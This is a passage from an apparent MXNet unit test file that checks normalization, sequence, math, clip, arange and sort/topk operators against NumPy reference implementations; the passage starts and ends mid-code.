np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
def test_layer_norm():
for enforce_safe_acc in ["1", "0"]:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for dtype, forward_check_eps, backward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4],
[1E-2, 1E-3, 1E-4]):
if dtype != np.float16:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]
else:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10)], [True, True] # large input + fp16 does not pass the forward check
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
